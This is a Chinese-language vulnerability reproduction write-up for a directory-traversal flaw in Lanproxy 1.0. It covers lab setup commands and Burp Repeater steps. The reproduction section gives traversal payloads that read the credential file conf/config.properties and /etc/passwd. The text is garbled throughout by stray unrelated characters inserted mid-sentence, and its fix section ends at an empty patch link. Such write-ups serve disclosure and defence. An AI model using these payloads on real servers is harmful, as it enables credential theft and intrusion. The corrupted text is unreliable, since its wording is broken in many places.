0x00簡(jiǎn)介
lanproxy是一個(gè)將局域網(wǎng)個(gè)人電腦虫溜、服務(wù)器代理到公網(wǎng)的內(nèi)網(wǎng)穿透工具,支持tcp流量轉(zhuǎn)發(fā)牲迫,可支持任何tcp上層協(xié)議(訪問(wèn)內(nèi)網(wǎng)網(wǎng)站耐朴、本地支付接口調(diào)試、ssh訪問(wèn)盹憎、遠(yuǎn)程桌面...)筛峭。目前市面上提供類似服務(wù)的有花生殼、TeamView陪每、GoToMyCloud等等影晓,但要使用第三方的公網(wǎng)服務(wù)器就必須為第三方付費(fèi),并且這些服務(wù)都有各種各樣的限制檩禾,此外挂签,由于數(shù)據(jù)包會(huì)流經(jīng)第三方,因此對(duì)數(shù)據(jù)安全也是一大隱患盼产。
0x01漏洞概述
Lanproxy1.0通過(guò)../繞過(guò)讀取任意文件饵婆。該漏洞允許目錄遍歷讀取/../conf/config.properties來(lái)獲取到內(nèi)部網(wǎng)連接的憑據(jù)。
0x02影響版本
Lanproxy1.0
0x03環(huán)境搭建
1.下載Lanproxy安裝包戏售,下載地址:
https://file.nioee.com/d/2e81550ebdbd416c933f/
2.解壓后運(yùn)動(dòng)到/usr/local目錄下
mv proxy-server-0.1/ /usr/local/
3.進(jìn)入proxy-server-0.1 bin目錄下給startup.sh加上執(zhí)行權(quán)限侨核,然后啟動(dòng)服務(wù)
cd proxy-server-0.1/bin
chmod +x startup.sh
./startup.sh
4.在瀏覽器訪問(wèn)http://your-ip:8090,出現(xiàn)以下登錄界面啟動(dòng)成功
0x04漏洞復(fù)現(xiàn)
1.在登錄頁(yè)面灌灾,使用Burp抓包搓译,并發(fā)送到Repeater(重放模塊)
2.在url構(gòu)造以下鏈接讀取配置文件
/../conf/config.properties
3.修改payload讀取敏感文件
../../../../etc/passwd
0x05修復(fù)建議
1、目前廠商已發(fā)布升級(jí)補(bǔ)丁以修復(fù)漏洞紧卒,補(bǔ)丁獲取鏈接: